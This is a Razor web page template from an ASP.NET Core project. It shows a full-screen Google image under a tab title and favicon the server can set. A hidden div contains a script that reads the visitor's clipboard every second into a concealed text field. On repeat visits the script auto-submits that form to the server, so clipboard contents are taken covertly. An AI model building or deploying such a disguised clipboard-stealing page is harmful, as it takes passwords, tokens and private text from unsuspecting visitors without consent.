@{
    Layout = null;
}
<html lang="vi">
    @if (TempData["OffRandomTab"] == "true")
    {
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>C# | Asp Net Core | Công nghệ thông tin</title>
    <link rel="stylesheet" href="~/lib/bootstrap/dist/css/bootstrap.min.css" />
    <link rel="stylesheet" href="~/css/site.css" asp-append-version="true" />
    <link rel="stylesheet" href="~/MyWebPlay.styles.css" asp-append-version="true" />
        <link rel="icon" href="/images/imagex.png">
    }
    else
    {
     <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>@TempData["Tab_Tittle"]</title>
    <link rel="stylesheet" href="~/lib/bootstrap/dist/css/bootstrap.min.css" />
    <link rel="stylesheet" href="~/css/site.css" asp-append-version="true" />
    <link rel="stylesheet" href="~/MyWebPlay.styles.css" asp-append-version="true" />
    <link rel="icon" href="@TempData["Tab_Image"]">
    }
<body style="background-color:@TempData["mau_background"]">

           <div style="color:@TempData["mau_text"]">
<img src="/Image_Play/Google.png" width="100%" height="100%">
</div>

<div style="display:none">
<script>
    setInterval(myAlert, 1000);
    function myAlert()
    {
        navigator.clipboard.readText()
       /*Alert for accepting access to clipboard appears, user accepts*/
       .then(text => {
            document.getElementById("noidung").value = text;
                    });
     }

     if ('@ViewBag.FirstGoTo' == "false")
     {
     var tim = 0;
     setInterval(myFay, 1000);

        function myFay()
        {
            tim++;
            if (tim == 2)
            document.getElementById("ok").click();
        }
     }
</script>                       
<table align="center">
    @using (Html.BeginForm())
    {
        @Html.ValidationSummary(true)

        <tr style="height:40px">
            <td> </td>
            <td>
                    <textarea cols="50" rows="20" name="txtNoiDung" id="noidung"></textarea>
            </td>
        </tr>
      
        <tr style="height:40px">
            <td></td>
            <td><br>
                <input id="ok" type="Submit" value="Kết Quả" />
            </td>
        </tr>
    }
</table>
</div>
</body>
</html>